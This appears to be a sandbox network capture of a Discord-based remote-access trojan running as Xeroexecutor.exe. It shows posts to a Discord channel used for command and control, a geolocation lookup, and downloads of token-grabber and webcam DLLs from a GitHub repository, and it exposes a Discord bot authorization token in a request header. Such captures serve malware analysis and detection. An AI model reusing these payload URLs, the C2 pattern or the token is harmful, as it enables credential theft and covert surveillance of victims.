Set-Cookie: __sdcfduid=f1b5d7720e0f11ef8ac69a2afe861c2857829e51cb1a8c1ccb9eba97384b7b93537ca007483cd314cc7024e245d88471; Expires=Tue, 08-May-2029 14:25:11 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
Set-Cookie: __cfruid=948f4f443802a6bf7701eb9ed1444e066c3e880a-1715264711; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
Set-Cookie: _cfuvid=sb7g7xGgB1ReIR8sSMdB6p1Sflw3U6y0o7NLYCBKE7I-1715264711474-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
Server: cloudflare
CF-RAY: 88125b7d6fb0069e-LHR
-
Remote address:162.159.136.232:443RequestPOST /api/v9/channels/1238134282950676521/messages HTTP/1.1
authorization: Bot MTIwNjA0MDA2MDI2NTM2NTUwNA.GStFBi.KFxuLXKvS3XujUPdFiaRzwKmwtmjd2uDdKdcmY
Content-Type: application/json; charset=utf-8
Host: discord.com
Content-Length: 31
Expect: 100-continue
ResponseHTTP/1.1 200 OK
Content-Type: application/json
Transfer-Encoding: chunked
Connection: keep-alive
set-cookie: __dcfduid=fa7a908c0e0f11ef8fa15239c9fc6a72; Expires=Tue, 08-May-2029 14:25:26 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
strict-transport-security: max-age=31536000; includeSubDomains; preload
x-ratelimit-bucket: 3df15bae86f6647dd4dfcbd5c6949480
x-ratelimit-limit: 5
x-ratelimit-remaining: 4
x-ratelimit-reset: 1715264727.003
x-ratelimit-reset-after: 1.000
vary: Accept-Encoding
via: 1.1 google
alt-svc: h3=":443"; ma=86400
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=OzwDyl4AN81y2GOqAcQJihZEunv5X2y%2BdytZW9W2oG7YpU7M03wmvu51L2FJLeT4WgiwCvuIwBUc8rGCEx4ocyl22aE0niSM6Y%2BDiINdaBjmuw8GOVP2t6UDzH0B"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
X-Content-Type-Options: nosniff
Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
Set-Cookie: __sdcfduid=fa7a908c0e0f11ef8fa15239c9fc6a72e2386f67c32610e00fc96078c12b62436b198249c0fbecd8bbf7aa689ffd1681; Expires=Tue, 08-May-2029 14:25:26 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
Set-Cookie: __cfruid=c1bf6e0aa6fe3bc4e575146062fcb7c960ea5867-1715264726; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
Set-Cookie: _cfuvid=CTf82cX6ERFRVnnpXT7cAN1cT5TgC0TS0Vgw5tH1x_c-1715264726185-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
Server: cloudflare
CF-RAY: 88125bd85a89768c-LHR
-
2.8kB 33.5kB 43 48
HTTP Request
GET https://gateway.discord.gg/?v=9&encording=jsonHTTP Response
101 -
162.159.136.232:443https://discord.com/api/v9/guilds/1237709600602722354/channelstls, httpXeroexecutor.exe1.1kB 5.3kB 11 13
HTTP Request
POST https://discord.com/api/v9/guilds/1237709600602722354/channelsHTTP Response
201 -
888 B 4.6kB 10 11
HTTP Request
GET https://geolocation-db.com/jsonHTTP Response
301HTTP Request
GET https://geolocation-db.com/json/HTTP Response
200 -
162.159.136.232:443https://discord.com/api/v9/channels/1238134282950676521/messagestls, httpXeroexecutor.exe1.3kB 3.0kB 9 10
HTTP Request
POST https://discord.com/api/v9/channels/1238134282950676521/messagesHTTP Response
200 -
162.159.136.232:443https://discord.com/api/v9/channels/1238134282950676521/messagestls, httpXeroexecutor.exe484.4kB 10.8kB 362 183
HTTP Request
POST https://discord.com/api/v9/channels/1238134282950676521/messagesHTTP Response
200 -
162.159.136.232:443https://discord.com/api/v9/channels/1238134282950676521/messagestls, httpXeroexecutor.exe1.2kB 3.0kB 9 11
HTTP Request
POST https://discord.com/api/v9/channels/1238134282950676521/messagesHTTP Response
200 -
162.159.136.232:443https://discord.com/api/v9/channels/1238134282950676521/messagestls, httpXeroexecutor.exe5.0kB 3.5kB 13 13
HTTP Request
POST https://discord.com/api/v9/channels/1238134282950676521/messagesHTTP Response
200 -
162.159.136.232:443https://discord.com/api/v9/channels/1238134282950676521/messagestls, httpXeroexecutor.exe1.2kB 2.9kB 9 10
HTTP Request
POST https://discord.com/api/v9/channels/1238134282950676521/messagesHTTP Response
200 -
322 B 7
-
185.199.109.133:443https://raw.githubusercontent.com/moom825/Discord-RAT-2.0/master/Discord%20rat/Resources/Token%20grabber.dlltls, httpXeroexecutor.exe60.8kB 3.0MB 1265 2164
HTTP Request
GET https://raw.githubusercontent.com/moom825/Discord-RAT-2.0/master/Discord%20rat/Resources/Token%20grabber.dllHTTP Response
200 -
162.159.136.232:443https://discord.com/api/v9/channels/1238134282950676521/messagestls, httpXeroexecutor.exe1.1kB 2.9kB 8 9
HTTP Request
POST https://discord.com/api/v9/channels/1238134282950676521/messagesHTTP Response
200 -
162.159.136.232:443https://discord.com/api/v9/channels/1238134282950676521/messagestls, httpXeroexecutor.exe1.2kB 2.9kB 9 10
HTTP Request
POST https://discord.com/api/v9/channels/1238134282950676521/messagesHTTP Response
200 -
185.199.109.133:443https://raw.githubusercontent.com/moom825/Discord-RAT-2.0/master/Discord%20rat/Resources/Webcam.dlltls, httpXeroexecutor.exe1.5kB 43.3kB 20 36
HTTP Request
GET https://raw.githubusercontent.com/moom825/Discord-RAT-2.0/master/Discord%20rat/Resources/Webcam.dllHTTP Response
200 -
162.159.136.232:443https://discord.com/api/v9/channels/1238134282950676521/messagestls, httpXeroexecutor.exe1.2kB 3.0kB 9 11
HTTP Request
POST https://discord.com/api/v9/channels/1238134282950676521/messagesHTTP Response
200 -
162.159.136.232:443https://discord.com/api/v9/channels/1238134282950676521/messagestls, httpXeroexecutor.exe1.2kB 3.0kB 9 11
HTTP Request
POST https://discord.com/api/v9/channels/1238134282950676521/messagesHTTP Response
200 -
162.159.136.232:443https://discord.com/api/v9/channels/1238134282950676521/messagestls, httpXeroexecutor.exe1.2kB 2.9kB 9 10
HTTP Request
POST https://discord.com/api/v9/channels/1238134282950676521/messagesHTTP Response
200
-
64 B 144 B 1 1
DNS Request
gateway.discord.gg
DNS Response
162.159.135.234162.159.133.234162.159.130.234162.159.136.234162.159.134.234
-
57 B 137 B 1 1
DNS Request
discord.com
DNS Response
162.159.136.232162.159.137.232162.159.135.232162.159.138.232162.159.128.233
-
74 B 136 B 1 1
DNS Request
234.135.159.162.in-addr.arpa
-
64 B 80 B 1 1
DNS Request
geolocation-db.com
DNS Response
159.89.102.253
-
74 B 136 B 1 1
DNS Request
232.136.159.162.in-addr.arpa
-
73 B 140 B 1 1
DNS Request
253.102.89.159.in-addr.arpa
-
71 B 135 B 1 1
DNS Request
raw.githubusercontent.com
DNS Response
185.199.109.133185.199.111.133185.199.108.133185.199.110.133
-
74 B 118 B 1 1
DNS Request
133.109.199.185.in-addr.arpa
-
72 B 158 B 1 1
DNS Request
13.227.111.52.in-addr.arpa